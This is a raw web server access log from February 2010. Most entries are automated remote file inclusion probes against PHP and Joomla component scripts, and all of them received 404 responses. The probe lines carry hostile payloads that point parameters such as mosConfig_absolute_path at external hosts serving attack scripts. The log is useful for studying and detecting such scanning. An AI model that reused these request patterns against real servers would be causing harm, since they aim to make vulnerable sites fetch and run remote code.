69.161.133.1 - - [14/Feb/2010:04:45:38 -0800] "GET /logs/access_100205.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:04:45:46 -0800] "GET /logs/access_100123.log//zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:04:46:02 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:04:46:02 -0800] "GET /logs/access_100105.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:04:46:02 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:46:10 -0800] "GET /logs/access_100117.log%20%20/mantis/login_page.php?g_meta_include_file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:04:46:18 -0800] "GET /zero_vote/login.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:04:46:18 -0800] "GET /logs//zero_vote/login.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:04:46:18 -0800] "GET /logs/access_100111.log//zero_vote/login.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:46:22 -0800] "GET /logs/access_100117.log%20%20/mantis/login_page.php?g_meta_include_file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:04:46:23 -0800] "GET /logs/access_100123.log//zero_vote/login.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.142.53.31 - - [14/Feb/2010:04:46:47 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "librabot/2.0 (+http://academic.research.microsoft.com/)" "puaga.com"
219.142.53.4 - - [14/Feb/2010:04:46:51 -0800] "GET /orange_g/forum/viewtopic.php?p=28737 HTTP/1.0" 404 5258 "-" "librabot/2.0 (+http://academic.research.microsoft.com/)" "puaga.com"
62.193.225.60 - - [14/Feb/2010:04:46:59 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:46:59 -0800] "GET /logs/access_100202.log//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:46:59 -0800] "GET /write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:47:03 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:47:05 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:47:06 -0800] "GET /logs/access_100126.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:47:09 -0800] "GET /write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:47:09 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:47:09 -0800] "GET /logs/access_100202.log//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:47:11 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:04:47:11 -0800] "GET /logs/access_100125.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:47:12 -0800] "GET /logs/access_100126.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:47:12 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:47:13 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:47:15 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:47:15 -0800] "GET /logs/access_100126.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:04:48:07 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:04:48:07 -0800] "GET /logs/access_100117.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:04:48:08 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:04:48:11 -0800] "GET /logs/access_100105.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:04:48:14 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:04:48:14 -0800] "GET /logs/access_100117.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:04:48:14 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:04:48:20 -0800] "GET /logs/access_100105.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:04:48:34 -0800] "GET /logs/access_100125.log//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:04:48:34 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:04:48:34 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:04:48:34 -0800] "GET /logs/access_100202.log//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [14/Feb/2010:04:49:03 -0800] "GET /index.php?r=1 HTTP/1.0" 200 3626 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [14/Feb/2010:04:49:04 -0800] "GET /style/5.style.css HTTP/1.0" 200 2407 "http://www.puaga.com/index.php?r=1" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [14/Feb/2010:04:49:04 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/index.php?r=1" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:04:49:29 -0800] "GET /logs/access_100202.log//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:04:49:29 -0800] "GET /write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:04:49:29 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:49:35 -0800] "GET /logs/access_100202.log//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:49:35 -0800] "GET /write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:49:35 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:49:54 -0800] "GET /logs/access_100111.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:50:17 -0800] "GET /write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:50:17 -0800] "GET /logs/access_100202.log//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:50:17 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:04:50:31 -0800] "GET /logs/access_100116.log/lostpasswd.php?env[include_prefix]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:04:50:31 -0800] "GET /logs/access_100105.log/lostpasswd.php?env[include_prefix]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:50:39 -0800] "GET /logs/access_100111.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [14/Feb/2010:04:51:02 -0800] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [14/Feb/2010:04:51:02 -0800] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [14/Feb/2010:04:51:02 -0800] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [14/Feb/2010:04:51:02 -0800] "GET /logs/access_090910.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [14/Feb/2010:04:51:02 -0800] "GET /logs/access_090910.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [14/Feb/2010:04:51:02 -0800] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [14/Feb/2010:04:51:07 -0800] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [14/Feb/2010:04:51:07 -0800] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [14/Feb/2010:04:51:07 -0800] "GET /logs/access_100121.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:51:27 -0800] "GET /logs/access_100111.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [14/Feb/2010:04:52:43 -0800] "GET /tour/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [14/Feb/2010:04:52:43 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://puaga.com/tour/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [14/Feb/2010:04:52:44 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/tour/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
208.70.79.113 - - [14/Feb/2010:04:53:03 -0800] "GET /logs/access_100109.log////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:04:53:16 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:04:53:22 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:04:53:22 -0800] "GET /logs/access_100127.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.191.227.2 - - [14/Feb/2010:04:54:11 -0800] "GET /logs/access_100112.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
207.191.227.2 - - [14/Feb/2010:04:54:11 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
207.191.227.2 - - [14/Feb/2010:04:54:11 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
90.176.234.205 - - [14/Feb/2010:04:54:43 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [14/Feb/2010:04:54:48 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [14/Feb/2010:04:54:48 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [14/Feb/2010:04:54:48 -0800] "GET /logs/access_100210.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [14/Feb/2010:04:54:50 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [14/Feb/2010:04:54:51 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [14/Feb/2010:04:54:53 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [14/Feb/2010:04:54:56 -0800] "GET /logs/access_100130.log////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [14/Feb/2010:04:54:56 -0800] "GET /logs/access_100210.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [14/Feb/2010:04:54:59 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [14/Feb/2010:04:55:00 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.191.227.2 - - [14/Feb/2010:04:55:04 -0800] "GET /logs/access_100109.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:04:55:06 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:04:55:06 -0800] "GET /logs/access_100127.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:04:55:11 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:04:55:20 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:04:55:49 -0800] "GET /logs/access_100121.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [14/Feb/2010:04:56:48 -0800] "GET /logs/access_100109.log////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [14/Feb/2010:04:56:49 -0800] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [14/Feb/2010:04:56:49 -0800] "GET /logs/access_100121.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [14/Feb/2010:04:56:49 -0800] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:04:57:09 -0800] "GET /logs/access_100210.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:04:57:09 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:04:57:09 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:57:10 -0800] "GET /logs/access_100126.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [14/Feb/2010:04:57:23 -0800] "GET /logs/access_100109.log////skin/ggambo7002_board/comment_modify.php?dir=http://chaminyoung.com/gnu_utf8/data/file/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:57:31 -0800] "GET /logs/access_100126.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:58:05 -0800] "GET /logs/access_100126.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:58:06 -0800] "GET /logs/access_100111.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:58:25 -0800] "GET /logs/access_100111.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [14/Feb/2010:04:58:29 -0800] "GET /logs/access_100130.log////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [14/Feb/2010:04:58:59 -0800] "GET /logs/access_100130.log////skin/ggambo7002_board/comment_modify.php?dir=http://chaminyoung.com/gnu_utf8/data/file/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:59:08 -0800] "GET /logs/access_100111.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:04:59:15 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:04:59:15 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:04:59:15 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:04:59:31 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.191.227.2 - - [14/Feb/2010:05:00:16 -0800] "GET /logs/access_100119.log//include/prodler.class.php?sPath=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
207.191.227.2 - - [14/Feb/2010:05:00:16 -0800] "GET /include/prodler.class.php?sPath=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
207.191.227.2 - - [14/Feb/2010:05:00:17 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:00:42 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:00:43 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
